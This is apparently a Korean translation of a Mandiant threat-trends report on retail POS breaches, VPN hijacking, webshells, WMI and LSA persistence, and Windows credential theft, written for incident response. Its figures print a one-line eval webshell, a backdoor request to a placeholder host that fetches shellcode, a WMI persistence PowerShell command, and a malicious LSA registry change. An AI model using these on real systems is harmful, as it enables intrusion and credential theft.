  11. 11. www.mandiant.com 9 리버스엔지니어 노력을 방해하고 백도어의 기능을 숨기는 것을 도와줍니다. 백도어는 압축을 풀은 드라이버를 사용자-공간 프로세스(윈도우즈 커널 외부에서 실행되는 프로세스)를 주입하는 능력을 셸코드로부터 얻습니다. 셸코드는 HTTP POST 요청을 하드 코드 IP 주소로 보내고, HTML 코멘트 내에 포함된 XOR 암호화된 셸코드를 다운로드합니다. 이 기법은 백도어를 매우 다용도로 사용하게 만들었습니다. 새로운 기능을 추가하는 것은 새 셸코드를 다운로드 및 실행하는 것만큼 쉬웠습니다. 셸코드를 이러한 방법으로 사용하는 것이 새로운 것은 아니나, 패커와 함께 사용된이 악성코드는 매우 정교한 것이었습니다. 그림 2는 백도어가 명령 및 제어(CnC) 서버와 통신하는 것을 상세하게 설명합니다. psexec_command를 사용하는 방법: psexec_command 모듈은 실행할 커맨드와 출력 파일(텍스트 파일)을 써서 윈도우즈 배치 파일로 보냅니다. 텍스트 파일과 윈도우즈 배치 파일에는 16 문자 파일 이름이 무작위로 생성됩니다. 그 다음에, 1단계에서 작성된 윈도우즈 배치 파일을 실행합니다. 그림 1은 윈도우즈 시스템 이벤트 로그에 기재된 서비스 정보를 보여줍니다. 그림 1: 메타스플로잇 psexec_command 모듈 서비스 설치 A service was installed in the system. Service Name: MRSWxwQmQxFGumEFsW Service File Name: %COMSPEC% /C echo dir ^> %SYSTEMDRIVE%WINDOWSTempTthwsVKvUhydrsNB.txt > WINDOWSTempRbhRmgALAHcdyWXG.bat & %COMSPEC% /C start %COMSPEC% /C WINDOWSTempRbhRmgALAHcdyWXG. bat ​Service Type: user mode service Service Start Type: demand start 그림 2: 백도어 통신 POST /evil.txt HTTP/1.0 Accept: */* Content-Length: 32 Content-Type: application/octet-stream User-Agent: Evil_UA_String Host: 1.2.3.4 Pragma: no-cache <POST_DATA> <!-XOR_Encoded_Shellcode -->
  12. 12. 10 www.mandiant.com 최일선에서 본 관점M-Trends 소매 체인 전체에 설치된 모든 금전등록기는 중앙 도메인 컨트롤러로 인증되었습니다. 이것은 소매 도메인 컨트롤러에 접속하는 모든 사람은 매장 금전등록기로 직접 접속할 수 있다는 것을 의미합니다. 데이터 탈취 공격자는 평문으로 된 도메인 관리자 패스워드를 입수한 후에 회사 환경에 설치된 윈도우즈 시스템에서 어떤 방해도 받지 않았습니다. 공격자는 그 시스템에서 소매 환경에 접속하는 것에 집중했습니다. 소매 환경은 다음과 같이 설정되었습니다. • 소매 도메인은 회사 도메인과 양방향 트러스트 관계를 가졌습니다. • 매장 금전등록기는 마이크로소프트 윈도우즈 XP를 실행했습니다. • 매장 금전등록기는 소매 도메인으로 연결되었습니다. 소매 기업에서 흔히 사용하는 이 설정은 공격자에게 다음과 같은 2가지 이점을 제공했습니다. 첫째, 앞에서 입수한 도메인 관리자 인증은 공격자에게 소매 도메인에 설치된 시스템에 대한 접속을 개방할 권한이 있는 활동 계정을 제공했습니다. 둘째, 소매 도메인은 회사 도메인의 하위 도메인이었습니다. 도메인 컨트롤러는 특정한 기능을 작동시키기 위해서 회사와 소매 도메인 컨트롤러 사이에 개방되어 있는 특정한 중요한 포트가 필요했습니다. 개방 포트는 소매 기업이 정한 다른 모든 방화벽 규칙을 우회했습니다. 공격자는 이러한 개방 포트를 사용하여 도메인 컨트롤러에 접속했고, 이 컨트롤러를 사용하여 소매 환경으로 전환했습니다. 소매 체인 전체에 설치된 모든 금전등록기는 중앙 도메인 컨트롤러로 인증되었습니다. 이것은 소매 도메인 컨트롤러에 접속하는 모든 사람은 매장 금전등록기로 직접 접속할 수 있다는 것을 의미합니다. 공격자는 소매 도메인 컨트롤러에 들어 있는 윈도우즈 배치 스크립트를 사용하여 POS 카드 수집 악성코드를 소매 기업의 모든 매장에 설치된 금전등록기로 복사했습니다. 그 다음에, 공격자는 예정된 윈도우즈 작업을 사용하여 악성코드를 실행했습니다. POS 악성코드는 POS 애플리케이션의 프로세스 메모리로부터 추적 데이터(마그네틱 띠에 저장된 신용카드 계좌 번호와 만료일 포함)를 수집했습니다. 공격자는 이 추적 데이터를 위조 카드를 만드는 범죄자들에게 판매할 수 있습니다. POS 카드 수집 악성코드는 OSQL (금전등록기에 사전 설치된 커맨드 라인 SQL 조회 툴)을 사용하여, 수집한 추적 데이터를 임시 MSSQL 데이터베이스 tempdb에 썼습니다. tempdb 표에 들어 있는 데이터는 MSSQL 서비스가 중지될 때 지워집니다. 공격자는 하루에 한 번씩 모든 매장 금전등록기에 저장된 tempdb 데이터 베이스를 조회하고, SQL 조회의 출력을 도메인 컨트롤러에 들어 있는 텍스트 파일로 보냅니다. 공격자는 이 컨트롤러에 수집한 추적 데이터가 들어 있는 텍스트 파일을 보관한 후에 그 파일을 아웃바운드 인터넷에 접속할 수 있는 소매 환경에 설치된 워크스테이션으로 전송했습니다. 공격자는 그 파일을 FTP를 사용하여 워크스테이션에서 공격자가 제어하는 서버로 전송했습니다. 그림 3은 공격이 전개되는 방법을 보여줍니다.
  13. 13. www.mandiant.com 11 그림 3: 공격 요약 2 3 1 4
  14. 14. 12 www.mandiant.com 최일선에서 본 관점M-Trends 교훈 돈이 가는 곳에는 범죄자가 뒤를 따릅니다. 소매 기업들은 항상 금전적 동기가 있는 사이버 범죄자로부터 집중 표적이 되어왔습니다. 저희는 2014 년에도 이러한 공격에 변화가 없다는 것을 관찰했습니다. 공격자들은 몇 가지 새로운 기법을 사용했고 헤드라인을 더 많이 장식했으나, 그들의 전술은 저희가 지난 몇 년 간 목격한 것과 대부분 일치했습니다. 권장 사항 이러한 공격이 급증하는 가운데, 소매 기업들은 어떤 조치를 취해야 합니까? 여러분은 모든 공격 또는 모든 침해를 방어할 수 없습니다. 그러나 가이드라인을 따르면 기업 환경으로 침입하여 내부로 이동하는 공격자의 능력을 저지할 수 있습니다. 적절한 툴과 보안팀이 있으면 공격을 지연시킬 수 있고, 최악의 상황이 발생하기 전에 탐지, 분석, 대응할 시간을 제공할 수 있습니다. 안전한 원격 접속 직원, 계약자, 벤더가 여러분의 환경에 원격으로 접속하는 방법을 평가하십시오. 원격 접속의 모든 측면(원격 접속 방법의 수, 인가된 사용자, 패스워드 요건 포함)을 통제하도록 노력하십시오. 모든 원격 접속 방법에 대해서는 이중 인증을 받아야 합니다. 모든 의심스러운 활동에 대해서는 반드시 원격 로그온을 적극적으로 모니터해야 합니다. PCI (Payment Card Industry) 환경에 대한 안전한 접속 지불 카드 산업(PCI) 환경을 나머지 네트워크로부터 분리하십시오. PCI 환경에 설치된 시스템에 대한 모든 접속은 보안이 강화된 구역 내에 설치된 장치를 관리하는 보안 점프 서버를 통과해야 합니다. 점프 서버에 접속하려면 이중 인증을 요구하십시오. 가능한 경우, 소매 도메인을 별도로 유지하여 다른 환경과의 연결을 더욱 최소화하십시오. 다른 조치로는, 아웃바운드 네트워크 트래픽을 비즈니스를 하기 위해 필요한 승인된 연결 리스트로 제한하십시오. 중요한 자산에 애플리케이션 화이트리스팅을 설치하십시오 모든 중요한 시스템에는 애플리케이션 화이트리스팅 기술을 사용하여 주요 시스템에서 악성 파일을 실행할 가능성을 줄여야 합니다. 이 기술에는 카드 소유자 데이터, 점프 서버, 그리고 도메인 컨트롤러 같은 중요한 시스템을 처리하는 모든 시스템이 포함되어야 합니다. 권한이 부여된 계정을 관리 공격자들은 로컬 관리자, 도메인 관리자, 서비스 계정 같은 권한이 부여된 계정을 표적으로 삼습니다. 권한이 부여된 계정의 수를 줄이십시오. 또한, 모든 로컬 관리자 계정에 고유한 패스워드가 있는지 확인하십시오. 고유한 인증을 관리하는 데 도움이 되고, 매번 사용한 후에 계정의 패스워드를 자동으로 변경할 수 있는 패스워드 저장 툴을 사용할 것을 고려하십시오. 이러한 기술을 사용하면 권한이 부여된 계정을 더 철저히 통제할 수 있습니다.
  15. 15. www.mandiant.com 13 이것은 고양이와 쥐의 싸움과 같습니다. 보안팀이 새로운 방어 시스템을 설치하면 공격자들은 전술을 변경합니다. 이러한 싸움은 2014년에도 계속되었습니다. 저희는 VPN을 탈취하여 피해자의 환경에 대한 접속을 유지하는 침입을 더 많이 관찰했습니다. 또한 저희는 탐지를 회피하기 위한 정교한 새로운 기법, 그리고 침해된 환경 전체에서 인증을 훔치고 내부로 이동하는 새로운 툴과 전술을 관찰했습니다. VPN 탈취 표적의 VPN을 획득하는 것은 공격자에게 2가지 뛰어난 이점을 제공합니다. 첫째, 공격자는 어떤 환경에서 백도어를 설치할 필요가 없이 존속할 수 있습니다. 둘째, 공격자는 인가된 사용자를 위조함으로써 환경에 섞여 들어갈 수 있습니다. 몇 년 전에, 저희는 침해된 네트워크에 거점을 마련한 후에 VPN 자산과 인증을 즉시 표적으로 삼은 위협 그룹을 조사한 적이 있습니다. 이러한 트렌드는 2014년에 새로운 수준에 도달했습니다. 저희는 공격자들이 피해자의 VPN에 접속한 사례를 그 어느 때보다도 더 많이 관찰했습니다. 저희는 대부분의 조사에서 2가지의 통상적인 VPN 공격 기법을 목격했습니다. • 단일 인증: 피해자의 VPN이 유효한 사용자 이름과 패스워드만을 요구한 경우, 공격자는 침해된 최종 사용자 시스템 또는 액티브 디렉토리 도메인에서 훔친 인증을 단순히 재사용했습니다. 트렌드 3: 발전하는 공격 라이프사이클 저희가 조사하는 대부분의 보안 사고들은 익숙한 패턴을 따릅니다. 저희는 이것을 공격 라이프사이클이라고 합니다. • 인증서 기반의 이중 인증: 피해자의 VPN이 사용자에게 디지털 인증서를 2차 인증 요소로 요구한 경우, 공격자는 미미카츠와 같은 광범위하게 제공되는 툴을 사용하여 침해된 최종 사용자 시스템에서 이러한 인증서를 추출했습니다. 또한 저희는 암호화되지 않은 이메일에 첨부되었거나 개방형 네트워크 파일 공유에 저장된 것 같은 안전하지 않은 방식으로 사용자에게 배포된 VPN 인증서를 공격자가 훔치는 사례를 목격했습니다. 비교적 소수지만 어떤 사례에서는, 공격자가 익스플로잇을 사용하여 VPN 인증을 완전히 우회했습니다. 이러한 예는 2014년 4월에 헤드라인을 장식한 전송 계층 보안(TLS) 하트비트 확장의 취약점인 "하트블리드"이었습니다. 피해를 입은 서버와 장치들은 탈취되어 요청에 따라 메모리로부터 최대 64킬로바이트의 데이터를 반송할 수 있었습니다. 연구자들은 처음에 이 취약점의 영향과 암호화 키 또는 사용자 인증 같은 민감한 데이터가 실세계 공격에서 도난될 수 있는지 여부에 대해 토의했습니다. 최악의 경우에 대한 그들의 우려는 현실이 되었습니다. 하트블리드가 공개된 후 몇 주 내에, 저희는 공격자가 VPN 장치에 대한 취약점을 사용하여 인가된 사용자들의 인증된 세션을 탈취하여 인증을 사용하지 않고 접속한 사례를 조사했습니다. 그 후 몇 주 내에, 공격자들은 하트블리드를 사용하여 다른 피해자의 VPN 인프라에 접속했습니다.
  16. 16. 14 www.mandiant.com 최일선에서 본 관점M-Trends 이러한 모든 사례에서, VPN 로그는 숨길 수 없는 증거의 출처였습니다. 공격의 표적이 된 인증된 사용자 세션의 소스 IP 주소는 신속하게 변경되고, 별개의 지역에서 서로 다른 IP 제공자들이 소유하고 있는 주소 블록 사이에 전환됩니다. 악성코드 숨기기 악성코드 탐지는 공격자와 방어자 사이의 끊임없는 무기 경쟁이고, 이러한 트렌드는 2014년에도 계속되었습니다. 저희는 공격자들이 몇 가지 새로운 기법을 사용하여 감염된 시스템에서 활동을 위장하고 지속적인 악성코드를 숨기는 것을 관찰했습니다. 웹셸 숨기기 웹 기반의 백도어는 웹셸이라고도 하며, 10년 전에 작성된 형태의 악성코드입니다. 그리고 네트워크와 호스트 기반 탐지로부터 웹셸을 숨기는 새로운 기법 때문에, 여전히 표적 공격에 많이 사용되고 있습니다. 그림 4: Mandiant가 조사 중에 목격한 새로운 공격 기법 저희는 공격자들이 보안 소켓 계층(SSL) 암호화를 사용한 서버에 웹셸을 정교하게 설치한 몇 가지 사례를 연구했습니다. 그 결과, 백도어가 주고 받는 모든 요청은 서버에 합법적으로 설치된 개인 키를 사용하여 암호화되었습니다. 피해자들은 보안 툴이 SSL 트래픽을 검사하도록 네트워크 아키텍처를 설정하지 않았기 때문에, 공격자의 활동은 탐지되지 않았습니다. 저희는 이러한 트렌드가 계속될 것이라고 예상합니다(특히 더 많은 조직들이 모든 인터넷 연결 웹 서비스에 대해 SSL 암호화를 채택하기 때문에). 저희가 목격한 또 하나의 잠복 기법에는 내장된 "에발(Eval)" 셸을 사용하여 합법적인 웹 페이지를 탈취하는 것이 포함되었고, 이 셸은 HTTP 요청 변수 내에 제출된 코드를 실행하도록 설계된 작은 백도어 스크립트입니다. 에발 셸은 길이가 단지 몇 십 바이트에 불과하므로, HTML 파일 내에 쉽게 숨길 수 있습니다.
  17. 17. www.mandiant.com 15 언어(파워셸과 VBScript 포함)는 WMI를 사용하여 데이터를 수집하고, 저수준 OS 컴포넌트와 상호작용을 하고, 커맨드를 실행할 수 있습니다. 또한 WMI는 지정된 객체의 상태에 대한 변경에 근거하여 애플리케이션(악성코드 포함)을 트리거할 수 있는 이벤트 프레임워크를 제공합니다. 지난 몇 년 간, 저희는 많은 공격자들이 WMI를 사용하여 탐지를 회피하는 것을 관찰한 적이 없습니다. 그 이유는 WMI와 상호작용을 하는 것이 복잡하고, 기본적인 지속성 기법만으로도 탐지를 회피하기에 충분했기 때문일 것입니다. 그러나, 2014년에는 소수의 위협 그룹이 WMI를 사용하여 은밀한 연결을 유지하는 것을 목격했습니다. 이 기법에는 3개의 WMI 객체를 작성(보통 파워셸을 통해서)하는 것이 포함됩니다. • ​Event Filter: 이것은 하루 중의 특정한 시간 또는 부팅 이후 경과된 초 수와 같은 지속성 메커니즘의 역할을 할 수 있는 반복 이벤트에 대해 시스템을 폴링하는 것이 포함됩니다. • Event Consumer: 지정된 스크립트 또는 커맨드를 실행하여 이벤트를 "consume" 합니다. 공격자들은 보통 임의적인 커맨드와 인수를 실행하는 커맨드 라인 이벤트 컨슈머, 또는 VBScript를 실행하는 액티브 스크립트 이벤트 컨슈머를 작성했습니다. • Fiter-to-Consumer Binding: 이것은 필터가 트리거될 때 지정된 컨슈머를 실행하는 것을 보장합니다. 그림 5: "에발" 웹셸의 예 <%@ Page Language=”Jscript”%><%eval(Request.Item[“p1”],”unsafe”);%> 그림 6: 변경된 web.config에서 발췌 부분 <!--HTTP Modules --> <modules> <add type=”Microsoft.Exchange.Clients.BadModule” name=”BadModule” /> </modules> 정상적인 HTTP 요청의 경우, 에발에 의해 침해된 웹 페이지는 평상시와 같은 상태를 유지합니다. 그러나 공격자가 올바른 변수를 사용하여 그 페이지를 요청하는 경우, 에발 문장은 제출된 (악성)코드를 분석 및 실행합니다. 그림 5는 자체적으로, 또는 다른 웹 페이지 내에 상주할 수 있는 완전한 에발 셸을 보여줍니다. 공격자의 웹셸 클라이언트는 요청 변수 p1에 악성코드를 내장해야 합니다. 웹 기반 악성코드의 마지막 예는 특히 교묘했습니다. 공격자는 마이크로소프트 인터넷 정보 서비스(IIS)를 실행하는 웹 서버에 대한 설정 파일(web.config)을 변경했습니다. 이러한 변경으로 인해 서버가 악성 HTTP 모듈을 로드했습니다. 그림 6은 변경된 web.config의 무효화된 발췌 부분을 보여줍니다. 이러한 변경으로 인해 서버가 공유 모듈 디렉토리로부터 BadModule.dll을 로드했고, 이 모듈을 사용하여 차후의 모든 웹 요청을 처리한 것이 확인되었습니다. 이 악성코드는 서버에 제출된 모든 웹 요청의 내용(애플리케이션 사용자 인증 포함)을 분석 및 캡쳐했습니다. 그림 6은 부분적으로 삭제된 예입니다. 이 사례의 경우, 모듈의 이름은 실제 마이크로소프트 DLL을 모방했습니다. 또한 공격자는 악성코드와 설정 파일의 타임스탬프를 변경하여 탐지를 회피했습니다. WMI를 사용한 지속 윈도우즈 관리 도구(WMI)는 광범위한 시스템 관리 능력과 인터페이스를 제공하는 윈도우즈의 핵심 컴포넌트입니다. 애플리케이션과 스크립트
  18. 18. 16 www.mandiant.com 최일선에서 본 관점M-Trends 그림 7: 위협 범죄자가 WMI를 사용하여 지속성을 유지하는 방법 2 3 1 SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_LocalTime' AND TargetInstance.Hour = 08 AND TargetInstance.Minute = 05 GROUP WITHIN 60 CommandLineTemplate="C:WINDOWSSystem32WindowsPowerShellv1.0powershell.exe –NonInteractive –enc SQBuAHYAbwBrAGUALQBDAG8AbQBtAGEAbgBkACAALQBDAG8AbQBwAHUAdABl..." 공격자는 파워셸 커맨드를 사용하여 다음과 같은 3가지 WMI 이벤트 객체를 작성합니다: 커맨드 또는 스크립트를 실행하는 소비자, 반복 상태에 대해 시스템을 폴링하는 필터, 필터를 소비자에게 연결하는 바인딩. " " Set-WmiInstance
  19. 19. www.mandiant.com 17 그림 8은 WMI 커맨드 라인 컨슈머를 작성하는 파워셸 신택스의 예를 보여주며, 이 컨슈머는 Base64 암호화 스트링을 인수로 사용하여 powershell.exe를 실행합니다. 이 스트링은 추가된 모든 파워셸 코드(즉, 기본적인 다운로더 또는 백도어)를 억제할 수 있고, 디스크에 스크립트 파일이 들어 있을 필요가 없습니다. 이 컨슈머가 적합한 이벤트 필터에 연결되면 반복적으로 실행할 수 있습니다. WMI 기반의 지속성은 포렌식 분석가에게 몇 가지 문제점을 제기합니다. 공격자들은 파워셸 커맨드를 사용하여 로컬 및 원격으로 실행되는 필터와 컨슈머를 작성할 수 있습니다. 많은 지속성 메커니즘과는 달리, 그들은 금전등록기에 아티팩트를 남겨놓지 않습니다. 이러한 객체들은 조사하기가 어려울 수 있는 복잡한 데이터베이스(WMI 리포지터리 objects. data) 내에 있는 디스크에 상주합니다. 또한, 윈도우즈는 디버그 수준의 로그가 활성화될 때만 새로 작성되었거나 트리거된 필터와 컨슈머를 감사합니다. 이것은 기본 설정이 아니거나, 이 로그에 의해 생성된 대량의 이벤트로 인해 장기적으로 사용하도록 의도된 것이 아닙니다.5 악성 보안 패키지 저희는 공격자들이 로컬 보안 인증(LSA) 보안 패키지(흔히 사용되지 않는 레지스트리 기반의 지속성 메커니즘)를 사용하여 탐지를 회피하는 동안 악성코드를 자동으로 로드하는 몇 가지 사례를 목격했습니다. 보안 패키지는 시스템을 시동할 때 LSA 에 의해 로드되는 DLL 세트입니다. 이러한 패키지는 레지스트리 키 HKLMSYSTEM CurrentControlSetControlLsa 내에 있는 값에 의해 설정됩니다. 이러한 각 값에는 %SYSTEMROOT%system32에서 로드될 파일 이름(확장자가 없는)을 참조하는 스트링 리스트가 들어 있습니다. LSA 패키지는 LSASS.EXE에 의해 자동으로 로드되므로, 관리자 권한이 있는 공격자는 입력 항목을 추가 또는 변경하여 악성 DLL을 지속할 수 있습니다. 저희가 2014년에 조사한 한 사례에서는, 한 공격자가 보안 패키지를 변경하여 다단계 백도어인 tspkgEx.dll의 로더 컴포넌트를 시스템에 유지했습니다.6 그림 9는 변경된 값을 보여줍니다. 이러한 변경으로 인해 시스템을 시동할 때 LSASS.EXE가 C:WINDOWSsystem32tspkgEx.dll을 로드했습니다. 그림 8: WMI 소비자를 작성하기 위한 파워셸 커맨드의 발췌 부분 Set-WmiInstance -Namespace “rootsubscription” -Class ‘CommandLineEventConsumer’ -Arguments @{ name=’EvilWMI’;CommandLineTemplate=”C:WINDOWSSystem32Window- sPowerShellv1.0powershell.exe –enc SQBuAHYAbwBrAGUALQBDAG8AG8AbQ...<SNIP>”;Run- Interactively=’false’} 5 Mandiant의 MIRcon 2014 컨퍼런스에는 이러한 기법에 대한 상세 정보와 사례연구를 제공하는 WMI와 파워셸에 대한 토의뿐만 아니라 탐지 및 포렌식 분석에 대한 권장 접근방법이 포함되었습니다. 이 프레젠테이션은 https://dl.mandiant.com/EE/library/ MIRcon2014/MIRcon_2014_IR_Track_There%27s_Something_About_WMI.pdf와 https://dl.mandiant.com/EE/library/MIRcon2014/MIRcon_2014_IR_Track_Investigating_Powershell_Attacks.pdf에서 제공됩니다. 6 저희는 이곳에서 dll을 무효화했습니다. 그림 9: HKLMSYSTEMCurrentControlSetControlLsaSecurity Packages를 변경하여 악성코드를 로드 SECURITY PACKAGES (before change): kerberos msv1_0 schannel wdigest tspkg pku2u SECURITY PACKAGES (after change): kerberos msv1_0 schannel wdigest tspkg pku2u tspkgEx
  20. 20. 18 www.mandiant.com 최일선에서 본 관점M-Trends LSA는 확장이 가능하기 때문에, 맞춤형 보안 패키지는 로그온할 때 사용자 인증을 처리하기 위해 사용할 수도 있습니다. 악성 보안 패키지는 이 능력을 이용하여 로그온 이벤트를 수행하는 동안 평문으로 된 패스워드를 캡쳐할 수 있습니다. 저희가 2014년에 조사한 한 표적 공격에서는 침입자가 이러한 목적으로 보안 패키지로 로드된 악성코드를 설치했습니다. 또한 광범위하게 제공되는 미미카츠7 툴킷에는 보안 제공자인 mimilib ssp가 포함되어, 패스워드가 로드되면 훔칠 수 있습니다.8 손쉬운 패스워드 절도 광범위하게 제공되는 인증 절도 툴을 사용함으로써 윈도우즈 환경에서 패스워드를 수집하고 권한을 확대하는 것이 훨씬 더 쉬워졌습니다. 2014년의 전체 기간 동안, 표적 공격자는 보통 다음과 같은 2가지 기법을 사용했습니다. • 도난된 NTLM 해시를 사용하여 인증하는 “Pass-the-hash” • 미미카츠를 사용하여 메모리에서 평문 패스워드를 복구 마이크로소프트는 윈도우즈 서버 2012 R2와 윈도우즈 8.1에서 이러한 기법의 영향을 줄였습니다(그러나 제거하지는 못했습니다). 그러나 저희가 작년에 지원한 대부분의 고객들은 여전히 서버 2008 기능 도메인과 윈도우즈 7 엔드포인트에 의존하고 있었습니다. Pass-the-hash는 특히 시스템 그룹이 동일한 로컬 관리자 패스워드를 사용하는 설정에서 유효성이 증명된 기법으로 남아 있습니다. 미미카츠는 운영 체제가 다양한 형태의 단일 사인온을 지원하기 위해 메모리에 유지하고 있는 평문 윈도우즈 패스워드를 유인함으로써 한걸음 앞서가고 있습니다. 한 직원의 워크스테이션에서는 노출이 사용자 자신의 도메인 계정 패스워드로 제한될 수 있습니다. 그러나, 원격 데스크탑 프로토콜(RDP) 또는 PsExec 유틸리티와 같은 많은 대화형 로그온 세션을 수신하는 공유 서버에서는 노출된 패스워드의 수가 훨씬 더 많을 수도 있습니다. 피해자들은 몇몇 감염된 시스템에서 액티브 디렉토리 도메인에 대한 완전한 침해에 이르는 경로가 매우 짧을 수 있다는 것을 신속하게 알게 되었습니다. 저희의 거의 모든 조사에서, 피해자의 안티바이러스 소프트웨어는 이 툴의 넓은 범위와 평판에도 불구하고 미미카츠를 차단하는 데 실패했습니다. 공격자들은 보통 소스 코드를 변경 및 재컴파일하여 탐지를 회피했습니다. 또는 메모리에서만 실행할 수 있는 “Invoke-Mimikatz” 파워셸 스크립트와 같은 변종을 설치했습니다. 또한 2014년에는 최신 윈도우즈 도메인의 기본 인증 메커니즘인 커베로스를 표적으로 한 몇 가지 새로운 공격 기법이 출현했습니다. 이러한 기법 중에서 가장 악명 높은 미미카츠 "골든 티켓"을 사용하면 도메인 컨트롤러를 침해한 침입자가 커베로스 티켓을 생성하여 모든 사용자에게 티켓을 제공할 수 있습니다. 이 골든 티켓은 오프라인에서 생성할 수 있고, 기한이 없는 수명 기간 동안 유효하게 남아 있고, 모든 계정을 위장하기 위해 사용할 수 있습니다— 패스워드를 재설정한 후에도. 골든 티켓이 있는 한 저희의 거의 모든 조사에서, 피해자의 안티바이러스 소프트웨어는 이 툴의 넓은 범위와 평판에도 불구하고, 미미카츠를 막는 데 실패했습니다. 공격자들은 보통 소스 코드를 변경 및 재컴파일하여 탐지를 회피했습니다. 7 https://github.com/gentilkiwi/mimikatz5 8 Matt Graeber는 MIRCon 2014에서 악성 보안 패키지, 그리고 사용을 탐지 및 제한하는 메커니즘에 대한 추가 연구를 발표했습니다. 이 발표는 https://dl.mandiant.com/EE/library/MIRcon2014/MIRcon_2014_IR_Track_Analysis_of_Malicious_SSP.pdf에서 제공됩니다
  21. 21. www.mandiant.com 19 공격자는 복구된 환경을 재침해하여 도메인 관리자 권한을 즉시 회복할 수 있었습니다. 골든 티켓 공격을 완화하기 위한 유일한 방법은, 우선적으로 도메인 침해를 피할 수 없는 한, 커베로스 키 배포 서비스 계정인krbtgt에 대한 패스워드를 연속해서 두 번 재설정하는 것입니다. 그렇게 하면 이 계정의 패스워드 이력을 지우고 이전에 생성된 모든 커베로스 티켓을 무효화할 수 있습니다. WMI와 파워셸을 사용하여 내부로 이동 과거에는, 일반적인 윈도우즈 공격에서 내부로 이동하고 커맨드를 실행하는 것에 보통 내장된 윈도우즈 유틸리티( net, at, 등), 맞춤형 악성코드, 배치 또는 비주얼 베이직(VB) 스크립트, 그리고 PsExec과 같은 일반적인 관리 툴의 혼합이 포함되었습니다. 이러한 기법은 신뢰할 수 있고, 공격자들이 쉽게 사용할 수 있었습니다. 그러나 그들은 은밀한 포렌식 아티팩트와 풋프린트에서 뒤쳐졌습니다. 저희는 2013년과 2014년 사이에 저희가 추적하고 있는 몇 개의 지능형 지속적 위협(APT) 그룹의 내부 이동 전술이 뚜렷하게 변화된 것을 목격했습니다. 이러한 그룹들은 WMI와 파워셸을 전보다 더 자주 사용하여 윈도우즈 환경 내에서 내부로 이동하고, 인증을 수집하고, 유용한 정보를 검색하고 있습니다. 이와 동일한 방법으로, 많은 보안 연구자들과 침투 시험 툴들은 지난 몇 년 간 파워셸을 채택했습니다. 그 결과, 공격자들과 방어자들이 배울 수 있는 정보와 소스 코드가 더 공개적으로 제공되었습니다. 저희는 이 섹션의 앞부분에서 공격자들이 WMI 이벤트를 사용하여 침해된 환경에서 연결을 유지하는 방법에 대해 설명했습니다. 또한 공격자들은 WMI 커맨드 라인 툴인 wmic.exe를 사용하고, 이 툴은 WMI의 능력을 셸과 스크립트로 확장합니다. 공격자들은 WMI를 사용하여 원격 시스템으로 연결하고, 레지스트리를 변경하고, 이벤트 로그에 접속하고, 가장 중요한 커맨드를 실행할 수 있습니다. 초기 로그온 이벤트를 제외하고, 원격 WMI는 접속된 시스템에 거의 증거를 남기지 않습니다. 저희가 2014년에 분석한 몇 가지 사례에서, 공격자들은 파워셸과 인메모리 스크립트를 사용하여 내부로 이동하고 인증을 수집했습니다. 파워셸 코드는 접속된 시스템에 설치된 디스크에 접속하지 않고 메모리에서 실행하므로, 어떤 증거도 남기지 않습니다. 그리고 일반적인 환경에 기본으로 설치된 이전 버전의 파워셸은 실행된 코드의 상세한 감사 기록을 유지할 수 없습니다. 교훈 지능형 위협 범죄자들은 툴과 전술을 계속 발전시켜 그들의 활동에 대한 포렌식 단서를 줄이고 탐지를 회피합니다. 공격의 표적이 된 조직들은 엔드포인트 시스템, 로그 소스, 네트워크 장치에 대해 실시간 모니터링능력과 "룩백(look-back)" 포렌식 능력을 반드시 유지해야 합니다. 침입자의 노력에 한걸음 앞서가기 위해서는 특정한 환경에 대해 정상적인 활동의 기준선을 설정하고, 이 기준선에서 벗어나는 활동을 적극적으로 탐색하는 것이 반드시 필요합니다.
  22. 22. 20 www.mandiant.com 최일선에서 본 관점M-Trends 저희는 작년을 러시아 위협 범죄자들을 추적하며 발견한 공격을 조사하면서 보냈고, 그 과저에서 범죄 조직과 국가가 지원하는 범죄자를 구별하기 어려운 애매한 부분을 찾았습니다. 툴과 스파이 활동에 필요한 기술을 구별하기가 더 어려워지는 경우, 범죄자들의 의도를 분석하는 것은 그들의 잠재적 영향을 자세히 조사하는 데 있어서 반드시 필요합니다. 저희가 추적하는 금융산업을 표적으로 하는 위협 그룹들 중 일부는 일반적인 기회주의적 사이버 범죄라기 보다는 국가가 후원하는 APT 활동처럼 보이는 특성을 나타냅니다. 21페이지에 있는 그림 10은 저희가 2014년에 조사한 알려진 APT 그룹과 사이버 범죄 사례 사이의 전술적 중복에 대해 설명합니다. 불확실한 공격 의도를 평가하는 것은 복잡합니다 이러한 전술적 중복을 감안하는 경우, 분석가들은 연구에 접근하거나 범죄자의 동기를 평가할 때 열린 마음을 유지해야 하고, 공격 의도를 파악하기 위해 하나의 기법이나 툴을 개별적으로 조사하는 것은 큰 효과가 없습니다. 저희가 작년에 추적한 최근의 러시아 기반 활동은 기술적영역을 해석해서 범죄자의 궁극적인 목표를 분석하는 것의 중요성과 어려운점을 명확하게 보여줍니다. 저희는 2014년 10월에 APT28의 활동에 대해 상세히 설명했고, 저희는 이 위협 그룹이 러시아 정부를 위해 민감한 정치 및 군사 인텔리전스를 훔치고 있다는 것을 확신합니다. APT28은 수년 간 방위산업 회사, 정부, 군사, 정부간 기구를 표적으로 삼아왔습니다. 다른 연구자들은 APT28과 유사하게 러시아 정부를 위해 스파이 활동을 하는 것처럼 보이는 또 하나의 러시아 기반 위협 그룹을 노출시켰습니다. 이 두 번째 그룹은 여러 연구자들에 의해 “샌드웜 팀,”9 “Quedagh”10 및 “BE2 APT”라고 알려졌습니다.11 트렌드 4: 모호한 경계—사이버 범죄자와 APT 범죄자가 서로의 전술을 부분적으로 공유 작년에 수행한 저희의 조사는 다음과 같은 새로 출현한 트렌드를 확인했습니다: 사이버 범죄자들은 APT 범죄자들의 전술을 부분적으로 훔치고 있고, APT 범죄자들은 사이버 범죄자들이 광범위하게 설치한 툴들을 사용하고 있습니다. 이러한 범죄자들의 전술이 합쳐짐에 따라, 그들의 목표를 파악하는 것이 사고의 피해를 측정하고 위험 정보를 활용하는 보안 전략을 구축하기 위해 매우 중요해졌습니다. 9 Cyber Espionage Operators Sandworm Team Leverage CVE-2014-4114 Zero-Day(사이버 스파이 활동 운영자인 샌드웜 팀이 CVE-2014-4114 제로데이를 활용).” iSight Partners. 2014년 10월 14일. 웹. 2014년 12월 2일.; 10 https://www.f-secure.com/documents/996508/1030745/blackenergy_whitepaper.pdf 11 https://securelist.com/blog/research/67353/be2-custom-plugins-router-abuse-and-target-profiles/
